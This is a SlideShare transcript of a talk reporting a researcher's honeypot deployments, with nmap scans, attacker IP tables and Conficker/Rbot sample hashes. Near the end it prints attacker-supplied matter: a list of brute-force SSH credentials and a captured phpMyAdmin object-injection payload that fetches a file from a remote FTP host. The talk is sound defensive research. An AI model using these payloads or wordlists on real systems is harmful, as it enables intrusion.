SlideShare ist ein Scribd-Unternehmen logo
1 von 93
Honeypots
Agenda
• About me
• What is a honeypot?
• Different kinds of honeypots
• Honeypots I used
• Different data I discovered
About me
• Husband
• Father
• Geek
• Gets distracted by shiny
  objects easy
• Breaker/Fixer of things
This is not a honeypot.
• Lance Spitzner’s definition of honeypots is
  as follows...
   • A honeypot is an information system resource
     whose value lies in unauthorized or illicit use of
     that resource. (May 2003)
Open source
• Argos
• HIHAT (High Interaction Honeypot Analysis
Toolkit)
• Capture-HPC
• Honeywall
    • Sebek (kernel module)
• Qebek

Commercial
• Windows XP SP0
• Windows Vista SP0
• Kippo
Open source
• nepenthes              • Kojoney
• dionaea                • Amun
• Glastopf               • SAFER Honeypot
• Google Hack Honeypot   (Spoofing Active
• HoneyC                 Fingerprints w/
• Honeyd                 Enhanced Replies)
                         • Thug
Commercial
• Specter
• KFSensor
• Honeypoint
• Clean-net
   • Wife and son’s
     laptops
• Dirty-net
   • My desktop
• ??
   • Honeybook
• Medium interaction
   • Kippo

• Low interaction
   • Amun
   • Glastopf
   •Dionaea
      • Local
      • “To the cloud”
Port   Amun                      Nepenthes             Dionaea

21     ftpd                                            ftp
25     imail
42     wins                      wins
69                                                     tftp
80     http                      asn1                  http
105    mercury

110    axigen, slmail, mdaemon

135    dcom                      dcom                  epmap


139    smb, ms06040, netdde      netbiosname, netdde


143    lotusdomino
Port   Amun                    Nepenthes             Dionaea
443    iis                     iis                   https

       lsass, pnp, dnsv2, asn1,
                                asn1, dcom, lsass,
445    ms06070, ms08067,                             smb
                                ms08067, pnp
       smb

554    helix
587    imail
617    arkeia
1023   sasserftpd              sasserftpd
1025   msdtc                   dcom, msdtc
1080   mydoom
1111   tivoli
1433                                                 mssql
Port   Amun       Nepenthes   Dionaea

1434              mssql

1581   tivoli

1900   arc

2101   msmq

2103   msmq       msmq

2105   msmq       msmq

2107   msmq       msmq

2380   goodtech

2555   upnp

2745   bagle      bagle
Port   Amun         Nepenthes   Dionaea
2954   hpopenview

2967   symantec     symantec

2968   symantec     symantec

3127   mydoom       mydoom

3128   mydoom

3140                optix

3268   trend

3306                            mysql

3372   msdtc        msdtc

3628   trend
Port   Amun         Nepenthes    Dionaea
5000   upnp         upnp

5060                             sip

5168   trend

5554   sasserftpd   sasserftpd

6070   arc

6101   veritas

6129   dameware     dameware

7144   peercast

8080   tivoli
9999   maxdb
• A low-interaction honeypot

• Emulates a wide range of different
  vulnerabilities.

• Payload transmitted by the attacker is
  analyzed

• Any download URL found is extracted.

• Next, the honeypot tries to download the
  malicious software and store it on the
  local hard disc, for further analyses.
• A web application honeypot

• Web server written in Python

• Popular attack type emulation
  already in place

   • Remote file inclusion
   • Local file inclusion
   • HTML injection via POST
     requests
   • SQL injection emulation
• Medium interaction SSH honeypot

• Designed to log brute force attacks
  and, most importantly, the entire
  shell interaction performed by the
  attacker.

• Has a fake file system you can
  read/write to.

• You can add additional commands
• “To catch bugs”

• meant to be a nepenthes
successor

   • Python embedded

   • can detect shellcodes

   • supports ipv6 and tls.

• A VoIP module has been
developed as part of GSoc
2011
# Nmap 6.01 scan initiated Wed Jul 25 21:46:59 2012 as: nmap -A -oN
/root/Desktop/dionaea_off.txt 192.168.1.197
Nmap scan report for lp (192.168.1.197)
Host is up (0.00075s latency).
All 1000 scanned ports on lp (192.168.1.197) are closed
MAC Address: 08:00:27:7C:3B:55 (Cadmus Computer Systems)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.75 ms lp (192.168.1.197)

OS and Service detection performed. Please report any incorrect results at
http://nmap.org/submit/ .
# Nmap done at Wed Jul 25 21:47:01 2012 -- 1 IP address (1 host up)
scanned in 2.28 seconds
# Nmap 6.01 scan initiated Wed Jul 25 21:47:16 2012 as: nmap -A -oN /root/Desktop/dionaea_on.txt 192.168.1.197
Nmap scan report for lp (192.168.1.197)Host is up (0.00087s latency).
Not shown: 990 closed ports
PORT STATE SERVICE                  VERSION
21/tcp open ftp             Dionaea honeypot ftpd
   |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
42/tcp open tcpwrapped
80/tcp open http?
  |_http-title: Directory listing for /
135/tcp open msrpc?
443/tcp open ssl/https?|_http-title: Directory listing for /
  | ssl-cert: Subject: commonName=Nepenthes Development
Team/organizationName=dionaea.carnivore.it/countryName=DE
  | Not valid before: 2012-07-26 01:47:37
  |_Not valid after: 2013-07-26 01:47:37445/tcp open microsoft-ds Dionaea honeypot smbd
1433/tcp open ms-sql-s Dionaea honeypot MS-SQL server
3306/tcp open mysql             MySQL 5.0.54| mysql-info: Protocol: 10
  | Version: 5.0.54
  | Thread ID: 1729232896
  | Some Capabilities: Connect with DB, Compress, Transactions, Secure Connection
  | Status: Autocommit|_Salt: aaaaaaaa
 5060/tcp open sip             (SIP end point; Status: 200 OK)5061/tcp open ssl/sip (SIP end point; Status: 200 OK)
  | ssl-cert: Subject: commonName=Nepenthes Development
Team/organizationName=dionaea.carnivore.it/countryName=DE| Not valid before: 2012-07-26 01:47:37|_Not valid after:
2013-07-26 01:47:374 services unrecognized despite returning data.

MAC Address: 08:00:27:7C:3B:55 (Cadmus Computer Systems)Device type: general purposeRunning: Linux 2.6.X|3.XOS
CPE: cpe:/o:linux:kernel:2.6 cpe:/o:linux:kernel:3OS details: Linux 2.6.38 - 3.2Network Distance: 1 hopHost script
results:|_nbstat: NetBIOS name: LP, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>|_smbv2-enabled: Server
doesn't support SMBv2 protocol| smb-security-mode: | Account that was used for smb scripts: guest| User-level
authentication| SMB Security: Challenge/response passwords supported|_ Message signing disabled (dangerous, but
default)| smb-os-discovery: | OS: Windows XP (Windows 2000 LAN Manager)| NetBIOS computer name: HOMEUSER-
• 14 pcap files, total of 102 Meg
• 129 “replay” files – 4 Meg
• 2 log files
  • Error log
  • Activity log
• 2 SQLite database files
  • Logsqlite – Activity log but in SQLite format
  • Sipaccounts
• 1 malicious executable
Day 1
• 44 Unique IP addresses
• Time it took to get connections – 14 minutes

Day 2
• xx Unique IP addresses
• Time it took to get connections -
• Malicious file uploaded




      • Never live with the results of one tool,
      always use multiple tools!!
TCP
Port    Occurrences        Protocol                                       Occurrence
  23         46              Telnet                     IP address             s
  22         42                SSH                     184.171.169.60         69
  80        40                 HTTP                     74.63.195.90          19
1080        38            SOCKS Proxy                  184.164.150.13          9
 135        34            DCE Endpoint                   64.31.14.106          5
  73         26              NETRJS                    101.78.154.123          4
 808        20       Net.TCP Port Sharing              118.122.188.96          3
  25         15               SMTP                      12.134.192.58          3
 993         14              IMAPS                      175.16.97.164          3
  110         11              POP3                     178.95.22.152           3
 139         9              NetBIOS                     184.52.56.26           3
    1         8             TCPMUX                    199.188.104.83           3
   21         6                 FTP                       211.147.3.19         3
  79          6              Finger                     221.2.209.46           3
 143          5               IMAP                        64.31.29.62          3
 587          5     SMTP (Email message submission)       71.99.147.51         3
 995          5        POP3 over TLS/SSL                 117.27.137.48         2
1096          5                  ??                   120.151.204.106          2
  43          4              WHOIS                        121.52.71.115        2
   81         4     Torpack – Onion routing              14.102.115.51         2
                                                        199.19.94.85           2
184.171.169.60




http://www.securedservers.com/index.php
184.171.169.60




http://www.securedservers.com/index.php
74.63.195.90
 http://limestonenetworks.com/
Occurrence
OS                                s                Link                      Occurrences
Linux                                      14      ethernet/modem                      54
Windows                                   30       IPv6/IPIP                               3
Solaris                                        1   pppoe (DSL)                         15
                                                   sometimes DSL (3)                       4


OS version - Windows                               OS version - Linux
XP/2000 (RFC1323+, w+, tstamp-)             2      2.6 (newer, 1)                          1
XP SP1+, 2000 SP3                          3       2.6 (newer, 2)                          2
2000 SP4, XP SP1+                          22      2.6 (newer, 3)                          4
                                                   2.6, seldom 2.4 (older,
2000 SP2+, XP SP1+ (seldom 98)             3       2)                                      5
                                                   2.6, seldom 2.4 (older,
                                                   4)                                      2
Day 1
Goals
• Get the honeypot installed and up and running
• Get some traffic
• Run some packet captures


Timeline
1. 2:55 pm
    1. Started dionaea
    2. I immediately run an nmap scan and it just lit up like a
       Christmas tree.
    3. That accounts for 1053 connection attempts.
    4. 6:44pm - Started wireshark packet capture
2. 3:07 - the first “attacker” appears (me)
    1. 6:58 - the first connection appears
Day 2
Goals
• Start saving packet captures (with “no arp” on the capture
filter)
• Get some traffic
    • Catch some malware?
Timeline
1. 11:12:04am
     1. Get a connection from 69.57.27.138
     2. Attempts connection to TCP port 135 (epmap). It gets a SYN,
         ACK.
2. 11:12:06 am
     1. Tftp session is initiated and malware is being dropped on
         system
3. 11:12:42 am
     1. Tftp session completes
4. 14:39:47 am
     1. He’s back! (Process from 1.1 starts all over again)
MD5 - aff643a5014a9d8e98b24fa4dac11623
• Virus Total – 40/42 detection ratio
    • Rbot
• ThreatExpert
    •A malicious backdoor trojan that runs in the
    background and allows remote access to the
    compromised system
    • A network-aware worm that attempts to
    replicate across the existing network(s)
IP Address and Domain Information – Chrome extension (from TCPIPUtils.

OrgName          Algona Municipal
                 Utilities
OrgId            AMU-6
Address          104 West Call Street

Address          PO Box 10
City             Algona
StateProv        IA
PostalCode                       50511
Country          US
RegDate                      1/20/2011
Updated                       7/6/2011



 http://www.netamu.com/
Goals
• To the cloud!
Round 2
Amazon EC2 Ubuntu 12.04 Microinstance
• Virginia
• Oregon
• San Paolo, South America
• Ireland
• Toyko (Thanks Sukotto_san!)

Unable to do
• Singapore
• Virginia
   • 3 files
• Oregon
   • 0 files
• South America
   • 1 file
• Toyko
   • 1 file
• Ireland
   • 40 files!!
• Virginia
   • 7a5acd7da5a5d7845a4bcd1a90019e69
      • VirusTotal – 40/44
      • W32/Conficker.worm.gen.a - Mcafee
   • 607a710f446de466fcb3be1e5c189c71
      • VirusTotal – 42/44
      • VirScan.org – File name - azsvf.nmg
   • 344770974dce3c039b48d27bd4e9a114
      • VirusTotal – 41/42
      • W32/Conficker.worm – Mcafee
      • ThreatExpert link -
        http://www.threatexpert.com/report.
        aspx?md5=344770974dce3c039b48d27bd4
        e9a114
Occurrence
IP Address       Occurrences    TCP Port          s            Protocol
175.23.26.55               11
61.147.103.85              7        1443        20         MSSQL Server
211.22.54.147              3                          Microsoft-DS Active
42.121.84.187              2                          Directory, Windows
31.13.232.59               2        445           6                shares
182.1.23.144               2                              NetBIOS NetBIOS
173.163.222.22              1        139          2       Session Service
211.22.54.145               1                         Microsoft Terminal
                                   3389           1          Server (RDP)
175.23.26.55
Port 1433

http://www.chinaunicom.com.hk/en/home/default.html
61.147.103.85
Port 1433

http://en.chinatelecom.com.cn/
7a5acd7da5a5d7845a4bcd1a90019e69 - Net-Worm.Win32.Kido.ih
344770974dce3c039b48d27bd4e9a114 - Net-Worm.Win32.Kido.ih




 http://www.telkomsel.com
344770974dce3c039b48d27bd4e9a114
607a710f446de466fcb3be1e5c189c71




http://www.hinet.net/
607a710f446de466fcb3be1e5c189c71
• South America
   • 1 file
       • 0139abdd353ca804aa654c8db556dc46
       • VirusTotal – 32/41
          • Kaspersky -
            Trojan.Win32.Jorik.IRCbot.qrq
0139abdd353ca804aa654c8db556dc46
• Toyko
   • 2 files
       • 933be7b1b0077563f639a99d131bde7f
          • From: http://esendfile.com/xx81.exe
          • File name: xx81.exe
          • Analysis date: 2012-11-02 23:08:50 UTC
          • VirusTotal – 33/44
              • Kaspersky - Trojan-
                Dropper.Win32.Injector.fyym
              • Microsoft -
                VirTool:Win32/CeeInject.gen!IJ
              • Sophos - Troj/ProcInj-N
       • csrss.exe
          • From: smb://87.241.82.99
              • (Didn’t save)
87.241.82.99
TCP
Port Occurances                     Protocol
 3306   909                  MySQL database system
  176    81                            ??
 1433    49                      MSSQL Server
34354    38                            ??
 3389    34              Microsoft Terminal Server (RDP)
80       31             Hypertext Transfer Protocol (HTTP)
110      18                Post Office Protocol v3 (POP3)
445      18        Microsoft-DS Active Directory, Windows shares
 25      13            Simple Mail Transfer Protocol (SMTP)
139       11               NetBIOS NetBIOS Session Service
 23      9                        Telnet protocol
                  Microsoft EPMAP (End Point Mapper), also known
 135     6        as DCE/RPC Locator service,[14] used to remotely
                           manage services including DHCP
                   server, DNSserver and WINS. Also used by DCOM
IP address   Occurrences
66.225.253.122                273
119.1.96.68                   192
58.211.69.182                 179
61.160.200.46                  99
210.195.52.9                    81
183.136.144.36                 78
202.165.179.118                38
37.46.112.145                   31
58.16.63.214                   30
201.116.201.248                28
121.245.220.214                24
165.225.128.229                 18
66.225.253.122
Port 3306




http://www.servercentral.com/
119.1.96.68
Port 3306



http://www.chinanet.com
• Ireland
   • 40 files
      • VirusTotal results
         • Kaspersky
         • Microsoft
         • Sophos
   • This was from a time frame spanning
     between
Detection
File name (MD5)          ratio:      Analysis date:        Kaspersky                 Microsoft              Sophos

8aefa2d9f0a6cf4d70ecc484             2011-06-25 22:20:53
a953c007                 37 / 42     UTC                   Net-Worm.Win32.Kido.ih    Worm:Win32/Conficker.B Mal/Conficker-A

7c3c59692a7d4c4f53187a4              2011-09-13 20:56:07
284bc53df               40 / 44      UTC                   Net-Worm.Win32.Kido.ih    Worm:Win32/Conficker.B Mal/Conficker-A

6dd2d5993d634aeab90682               2011-12-07 07:00:30
ad2e59376f             38 / 43       UTC                   Net-Worm.Win32.Kido.ih    Worm:Win32/Conficker.B Mal/Conficker-A

deaf1f22c26f974a7977ba56             2012-08-05 02:50:41
78e159a9                 36 / 41     UTC                   Net-Worm.Win32.Kido.ih    Worm:Win32/Conficker.C Mal/Conficker-A

4d2694b90c3fb8e6f9116c2              2012-08-28 05:32:10
0e8cbfa91               38 / 41      UTC                   Net-Worm.Win32.Kido.ih    Worm:Win32/Conficker.B Mal/Conficker-A

9abd8f29a3d24c1c6c32260              2012-09-22 16:47:01
e8493ac43               29 / 31      UTC                   Backdoor.Win32.Rbot.bqj   n/a                    n/a

0c059b0d1d5a03f69a21185              2012-11-05 05:32:43
987c17d5c               42 / 44      UTC                   Net-Worm.Win32.Kido.ih    Worm:Win32/Conficker.C Mal/Conficker-A

0d8478eec0a3d9632e7d7c               2012-11-05 05:32:52
d432f7ee09             41 / 44       UTC                   Backdoor.Win32.Rbot.bqj   Backdoor:Win32/Rbot    W32/Rbot-Gen

16ebc1c90231a9e78ed1ed               2012-11-05 05:33:29
e0a58e58cb             18 / 21       UTC                   n/a                       n/a                    Mal/Conficker-A

2aeae56802c4efc7b68e8e1              2012-11-05 05:35:09
f6b04edea               41 / 44      UTC                   Net-Worm.Win32.Kido.ih    Worm:Win32/Conficker.B Mal/Conficker-A
Detection
File name (MD5)                ratio:    Analysis date:          Kaspersky                Microsoft               Sophos

2e8da5a55865a091864a4338ef4d                                                              Worm:Win32/Conficker.C Mal/Conficker-
2e44                         42 / 44     2012-11-05 05:35:26 UTC Net-Worm.Win32.Kido.ih                          A

344770974dce3c039b48d27bd4e9                                                                                   Mal/Conficker-
a114                         42 / 44     2012-11-05 05:35:49 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B A

3d17d15d86c34874039e77341aab                                                                                   Mal/Conficker-
b1c4                         41 / 44     2012-11-05 05:36:33 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B A

3f46687b1f8d403b901e46a37045                                                                                   Mal/Conficker-
08ea                         42 / 44     2012-11-05 05:36:46 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B A

4934ddd5bdfa5635f946667d66c83                                    Trojan.Win32.Genome.m                        Mal/Conficker-
4b6                           41 / 43    2012-11-05 05:37:25 UTC voq                   Worm:Win32/Conficker.B A

4fbcfb9557656c96edb479e30eef2f                                                                                 Mal/Conficker-
b3                             43 / 44   2012-11-05 05:38:02 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B A

574cf0062911c8c4eca2156187b8                                                                                   Mal/Conficker-
207d                         42 / 44     2012-11-05 05:38:35 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B A

58a4a4bbba4d75dbc6c6c7c9b439                                                                                   Mal/Conficker-
955d                         39 / 43     2012-11-05 05:38:39 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B A

59fe65fad4849c95ed538475c1f70                                    Trojan.Win32.Genome.wj                        Mal/Conficker-
7cf                           42 / 44    2012-11-05 05:38:51 UTC uk                     Worm:Win32/Conficker.C A

5cd426dbec0619b9500a96f24b38                                                                                   Mal/Conficker-
86c8                         41 / 44     2012-11-05 05:39:05 UTC Net-Worm.Win32.Kido.ks Worm:Win32/Conficker.B A

6ce65eea05ae7fc659a455b5e158                                                                                   Mal/Conficker-
9ab0                         40 / 43     2012-11-05 05:40:44 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B A
Detection
File name (MD5)               ratio:    Analysis date:        Kaspersky              Microsoft              Sophos

78c9042bbcefd65beaa0d40386da            2012-11-05 05:41:28
9f89                         39 / 40    UTC                   n/a                    Worm:Win32/Conficker.C Mal/Conficker-A

7bb455ea4a77b24478fba4de145             2012-11-05 05:41:45
115eb                       40 / 43     UTC                   Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B Mal/Conficker-A

94e689d7d6bc7c769d09a590667             2012-11-05 05:43:42
27497                       42 / 43     UTC                   Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B Mal/Conficker-A

961cfb405f6aa100bf6a3d66507ed           2012-11-05 05:43:54
a18                           41 / 44   UTC                   Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B Mal/Conficker-A

9c09418c738e265a27e6c599f43d            2012-11-05 05:44:19
86ab                         43 / 44    UTC                   Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B Mal/Conficker-A

a312c8b1adb48a60b0f755a5711b            2012-11-05 05:44:57   Trojan.Win32.Genome.h
8995                         43 / 44    UTC                   kck                   Worm:Win32/Conficker.C Mal/Conficker-A

acf4da36e762084070f8138a4314            2012-11-05 05:45:49
4759                         43 / 44    UTC                   Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B Mal/Conficker-A

b081022fc581decf4c8640dbc74a            2012-11-05 05:46:09
9198                         42 / 43    UTC                   Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B Mal/Conficker-A

bc9d30d59788c70060d7eabd6ab             2012-11-05 05:46:57
5e663                       41 / 44     UTC                   Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B Mal/Conficker-A

bdc18dfcfa63861aaa9d9fb95919d           2012-11-05 05:47:01
32a                           42 / 44   UTC                   Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B Mal/Conficker-A
Detection
File name (MD5)                 ratio:      Analysis date:      Kaspersky                Microsoft            Sophos

c7277972654775258bf3d4d6936eb               2012-11-05 05:48:00                          Worm:Win32/Conficker Mal/Conficker-
1b0                           41 / 44       UTC                 Net-Worm.Win32.Kido.ih   .B                   A

cae4b7963f5e43033664299a4d5bd               2012-11-05 05:48:11                          Worm:Win32/Conficker Mal/Conficker-
176                           43 / 44       UTC                 Net-Worm.Win32.Kido.ih   .B                   A

d45895e3980c96b077cb4ed8dc163               2012-11-05 05:48:48                          Worm:Win32/Conficker Mal/Conficker-
db8                           43 / 44       UTC                 Trojan.Win32.Genome.taql .C                   A

d90b4a84515f3a4d7d4ca716d9263               2012-11-05 05:49:11                          Worm:Win32/Conficker Mal/Conficker-
a5e                           42 / 44       UTC                 Net-Worm.Win32.Kido.ih   .B                   A

e1855fbe6cf64738bffb9dc195e38ed             2012-11-05 05:49:46                          Worm:Win32/Conficker Mal/Conficker-
1                               41 / 44     UTC                 Net-Worm.Win32.Kido.ih   .B                   A

e53ed987e82ad7bf076c23d91401c               2012-11-05 05:50:05                          Worm:Win32/Conficker Mal/Conficker-
ac7                           42 / 44       UTC                 Net-Worm.Win32.Kido.ih   .B                   A

ef87b673c8e3b77bdf2342e42e1b5f              2012-11-05 05:50:49 Net-                   Worm:Win32/Conficker Mal/Conficker-
0c                             43 / 44      UTC                 Worm.Win32.Kido.dam.ba .C                   A

fb34cb2d017899592aa1c8d578bfa4              2012-11-05 05:51:36                          Worm:Win32/Conficker Mal/Conficker-
55                             41 / 44      UTC                 Net-Worm.Win32.Kido.ih   .B                   A

d41d8cd98f00b204e9800998ecf842              2012-11-05 16:11:31
7e                             0 / 42       UTC                 -                        -                    -
TCP Port Occurrences                        Protocol
     3306        205                  MySQL database system
      1433         173                    MSSQL Server
       445        154      Microsoft-DS Active Directory, Windows shares
    5060           45             Session Initiation Protocol (SIP)
        139         38          NetBIOS NetBIOS Session Service
         80         32          Hypertext Transfer Protocol (HTTP)
     3389            13          Microsoft Terminal Server (RDP)
     1080             11                   SOCKS proxy
        135           6               DCE endpoint resolution
    9097              5                         ??
          23          3                   Telnet protocol
         110          3           Post Office Protocol v3 (POP3)
IP address      Occurrences          GeoIP location                        Interesting notes
                                                                   TCPIPUtils.com – 1 of 4 spam databases
                                                                       48 different websites near this IP
61.147.103.137             147      Beijing, Beijing, China (CN)
                                  Gaza, Palestinian Territory
188.161.92.153              44                              (PS) TCPIPUtils.com – 1 of 4 spam databases
42.121.19.84                27   Hangzhou, Zhejiang, China (CN) TCPIPUtils.com – 1 of 4 spam databases
203.162.35.88               23                    Vietnam (VN)
125.65.108.65               16     Chengdu, Sichuan, China (CN)        68 different websites near this IP
                                        Buenos Aires, Distrito
181.0.218.144               16        Federal, Argentina (AR)
                                                                   26 different websites near this IP
65.18.174.167               16                  Near Wichita, KS       including datemarriedwomen.org
                                                                 Same website where malware from
111.249.26.205              14     Taipei, T'ai-pei, Taiwan (TW)                 Virginia came from.
211.154.213.122             12      Beijing, Beijing, China (CN)
                                                                   TCPIPUtils.com – 1 of 4 spam databases
42.120.0.238                12   Hangzhou, Zhejiang, China (CN)
                                 São Paulo, Sao Paulo, Brazil TCPIPUtils.com – 1 of 4 spam databases
187.35.61.105               10                            (BR)
                                                                   17 different websites near this IP
210.211.117.81              10                   Vietnam (VN)
t1na/t1na             pass/pass           oscar/oscar             luciana/luciana
t1na/tina             f/f                 bot/bot                 volume/volume
alexis/alexis         roberto/roberto     ba/ba                   boootz/boootz
logic/logic           haiduc/haiduc       telegest/telegest       display/display
art/art               rapper/rapper       mwyatt/mwyatt           red/red
a/a                   vova/vova           j/j                     wolf/wolf
diablo/diablo         medina/medina       luci/luci               m/m
desiree/desiree       password/password   silvia/silvia           vcsa/vcsa
b/b                   g/g                 apocalipsa/apocalipsa   dummy/dummy
b1ablo/d1ablo         kim/kim             simbol/simbol           maria/maria
slim/slim             ionita/ionita       boot/boot               ion/ion
abel/abel             raper/raper         best/best               sah/sah
c/c                   vava/vava           ha/ha                   powered/powered
paradise/paradise     passwd/passwd       k/k                     bombastik/bombastik
eminem/eminem         nicoara/nicoara     postgres/postgres       good/good
doris/doris           h/h                 lucian/lucian           pink/pink
shortcut/shortcut     goncalo/goncalo     apocalipse/apocalipse   n/n
d/d                   space/space         ioana/ioana             visa/visa
paradisse/paradisse   jurca/jurca         skin/skin               gianluca/gianluca
shaggy/shaggy         st/st               addicted/addicted       atb/atb
damian/damian         baba/baba           bots/bots               bus/bus
adm/adm               change/change       thebest/thebest         melania/melania
e/e                   slayer/slayer       l/l                     power/power
baggio/baggio         i/i                 gdm/gdm                 dudu/dudu
haitac/haitac         lucia/lucia         box/box                 bela/bela
rap/rap               apoi/apoi           maria/maria             fantastic/fantastic
jean/jean             sst/sst             ying/yiang              bad/bad
blue/blue               vh/vh                   putty/putty           marian/marian
luca/luca               yahoo/yahoo             ven/ven               conterstrike/conterstrike
claudius/claudius       sly/sly                 cs/cs                 abo/abo
o/o                     q/q                     s/s                   cretu/cretu
mastercard/mastercard   maryjane/maryjane       tehnolog/tehnolog     ness/ness
buzzz/buzzz             buzz/buzz               leo/leo123            u/u
bella/bella             mago/mago               herbagen/herbagen     calcul/calcul
mumu/mumu               lammer/lammer           romana/romana         cimlinux/cimlinux
mada/mada               pasare/pasare           caine/caine           hacker/hacker
skype/skype             skywalker/skywalker     shoot/shoot           anton/anton
sybille/sybille         sims2/sims2             stat/stat             germana/germana
bed/bed                 tim/tim                 mandi/mandi           europa/europa
p/p                     discovery/discovery     ana/ana               slow/slow
officeinn/officeinn     hotmail/hostmail        ambulator/ambulator   race/race
terriffic/terriffic     vn/vn                   joc/joc               portocala/portocala
root/password           accept/accept           conter/conter         mark/mark
suga/suga               marianne/marianne       lp/lp                 v/v
master/master           xman/xman               next/next             cserv/cserv
buz/buz                 r/r                     t/t                   ne/ne
madalina/madalina       matematica/matematica   quatrida/quatrida     atai/atai
muie/muie               bird/bird               gaming/gaming         creata/creata
inger/inger             pisica/pisica           zeppelin/zeppelin     casa/casa
skipe/skipe             bang/bang               engleza/engleza       reebok/reebok
sims/sims               madi/madi               mandarina/mandarina   gary/gary
qwerty/qwerty           lamer/lamer             dog/dog               tetranet/tetranet
amex/amex               pix/pix                 shot/shot             rusia/rusia
postgres/postgres       sync/sync               tara/tara             granta/granta
smal/smal
banana/banana
yes/yes
w/w
ting/ting
cretzu/cretzu
nemesis/nemesis
serv/serv
arpanet/arpanet
nee/nee
caro/caro
tax/tax
moscova/moscova
Started – 10:10pm November 5th   Total – 229 attempts from a single IP




Stopped – 4:51pm November 6th
action=lay_navigation&eoltype=unix&token=&configuration=a:1:{i:0;O:10:"PMA
 _Config":1:{s:6:"source";s:45:"ftp://hawk1156:PKTuN123@hawkish.co.uk/ieh.ic
 o";}}




http://ubuntuforums.org/showthread.php?t=2076978
Websites
• Honeynet Projects - http://www.honeynet.org/
   • Dionaea - http://dionaea.carnivore.it/
   • Honeywall - https://projects.honeynet.org/honeywall/
• Amun: Python Honeypot - http://amunhoney.sourceforge.net/
• Kippo – http://code.google.com/p/kippo/
   • Examples
       • http://blog.macuyiko.com/2011/03/running-ssh-honeypot-
          with-kippo-lets.html
       • http://www.austinriba.com/2011/10/fun-and-trickery-
          with-the-kippo-ssh-honeypot/

• ShadowServer - http://www.shadowserver.org/
• Spiderlabs WASC Distributed Web Honeypots Project -
  http://blog.spiderlabs.com/2012/02/wasc-distributed-web-
  honeypots-project-update.html
Websites
• Scumware - http://www.scumware.org/index.scumware
• VirusTotal - https://www.virustotal.com/
• TCPIPUtils - http://www.tcpiputils.com/ (Great Chrome
  extension)




Tools
• Wireshark
• Network Miner
• Netwitness Investigator
• A host at $IP ($location)tried to log into my
  honeypot's fake Terminal Services server
• GET-based RFI attack from $IP ($location)
• A host at $IP ($location)tried to log into my
  honeypot's fake MSSQL Server

 http://inguardians.com/
Keith Dixon
@Tazdrumm3r
#misec – Tazdrumm3r
tazdrummer@gmail.com
http://tazdrumm3r.wordpress.com
http://hakshop.myshopify.com/products/wifi-pineapple
The Hot-Spot Honeypot Pen-Testing Platform
http://securityonion.blogspot.com/


• Installing a honeypot? Why not have all the monitoring tools
  already in place?
    • And there are some bad ass tools on this distro.
• Counting Security Onion is Xubuntu based and all of the honeypot
  installs are based on Lubuntu, I suspect there won’t be any issues.
    • I haven’t tested this to confirm. If you find out otherwise,
      email me. I’d love to know your what you experience.
Mercury – Live Honeypot DVD
ftp://ftp.carnivore.it/projects/dionaea/mercury-dvd


 http://blog.infosanity.co.uk/2010/09/22/mercury-live-honeypot-dvd/


Mercury Live DVD was initially (I believe) announced in a post to the
Nepenthes Mailing list. It is a remastered Ubuntu distribution with pre-installed
honeypot applications and malware analysis tools created by John Moore.
From the ReadMe:

This live DVD is a remastered version of Ubuntu 10.0 Beta LTS x86_32. It was
designed due to my being disappointed with another reverse engineering
malware live CD that was released recently. I have decided to call my creation
MERCURY, which is an acronym for Malware Enumeration, Capture, and
Reverse Engineering.
The Mercury live DVD contains tools used for digital forensics, data recovery,
network monitoring, and spoofing. It should primarily be used as a honeypot or
network monitoring platform as well as a laboratory and teaching aid. There are
three honeypots installed – honeyd, nepenthes, and dionaea. Four, if you
Scripts, tools and other lessons learned

• Amun
   • amun_install.sh
        • Location to grab the file
        • How to set it up
• Dionaea
   • install_dionaea.sh (Quick and easy setup)
   • install_dionaea_full_monty.sh (previously ran successfully on a Mint
      12 install)
   • run_dionaea.sh
   • run_p0f_dionaea.sh (In case you want to capture OS information)
• Glastopf
   • setup_glastopf.sh (Script untested, but ran through steps manually
      successfully)
• Kippo
   • kippo_install.sh (This is one option on installing and running {last line
      runs it})
Scripts, tools and other lessons learned
Lessons learned
• Run only one honeypot at a time
• When running a honeypot from the cloud, test test and retest your
  packet capture script
    • When in doubt, use dumpcap (it’s been the most successful for me)
• Adjust the level of logging on dionaea if you’re running in the cloud,
  especially if you’re in an extremely active area.
    • Downloading a 4 Gig log file from Ireland was not a quick process
    • First time running dionaea, log everything.
         • Adjust your logging level according to the information you see.
             • If a lot is not useful, dial it back a notch or two.
• Install on an Ubuntu based system.
    • I tried installing on a Debian based load and ran into dependency
       issues.
         • The keyboard is small and I want to minimize the time at the
            keyboard. ;)
    • I haven’t tried Fedora or OpenSuSE or BSD based systems.
         • If you do, let me know your results. (See slide # 88 for my
            contact info)
• Take the time to get a good dionaea config file.
    • Getting the malware is good. Automatically submitting to

Weitere ähnliche Inhalte

Was ist angesagt?

OpenStack networking
OpenStack networkingOpenStack networking
OpenStack networking
Sim Janghoon
 

Was ist angesagt? (16)

Understanding Open vSwitch
Understanding Open vSwitch Understanding Open vSwitch
Understanding Open vSwitch
 
Understanding docker networking
Understanding docker networkingUnderstanding docker networking
Understanding docker networking
 
Openstack Testbed_ovs_virtualbox_devstack_single node
Openstack Testbed_ovs_virtualbox_devstack_single nodeOpenstack Testbed_ovs_virtualbox_devstack_single node
Openstack Testbed_ovs_virtualbox_devstack_single node
 
OpenStack networking
OpenStack networkingOpenStack networking
OpenStack networking
 
ONOS SDN Controller - Clustering Tests & Experiments
ONOS SDN Controller - Clustering Tests & Experiments ONOS SDN Controller - Clustering Tests & Experiments
